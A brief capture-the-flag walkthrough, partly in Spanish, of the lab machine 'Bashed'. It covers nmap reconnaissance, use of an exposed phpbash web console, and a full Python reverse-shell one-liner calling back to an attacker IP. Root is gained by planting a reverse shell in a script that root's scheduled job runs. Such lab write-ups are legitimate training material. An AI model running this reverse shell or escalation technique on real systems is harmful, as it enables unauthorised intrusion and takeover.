# BASHED [TOC] ## RECON Carlos: `sudo nmap -p- -sS --min-rate 5000 -Pn -n -vvv --open 10.10.10.68 -oG ports.gp` `sudo nmap -p80 -sV -sC --min-rate 5000 -Pn -n -vvv --open 10.10.10.68 -oG ports_recon.txt` `sudo nmap --script web-scan -p80 10.10.10.68` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-04 04:31 GMT Nmap scan report for 10.10.10.68 Host is up (0.11s latency). PORT STATE SERVICE 80/tcp open http | http-enum: | /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' | /dev/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' | /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' | /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' | /php/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' |_ /uploads/: Potentially interesting folder Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds ``` http://10.10.10.68/dev/phpbash.php --> Interactive web cli ## EXPLOTACION Carlos: http://10.10.10.68/dev/phpbash.php --> `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.8",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` ## POST-EXPLOTACION Carlos: `sudo -u scriptmanager /bin/bash -i` `./pspy64` -> Detecto que root ejecuta archivo .py de /scripts Meto una reverse shell en /scripts/test.py y abro un nc en mi maquina y en poco tiempo recibo una conexion y consigo acceso al sistema como el usuario root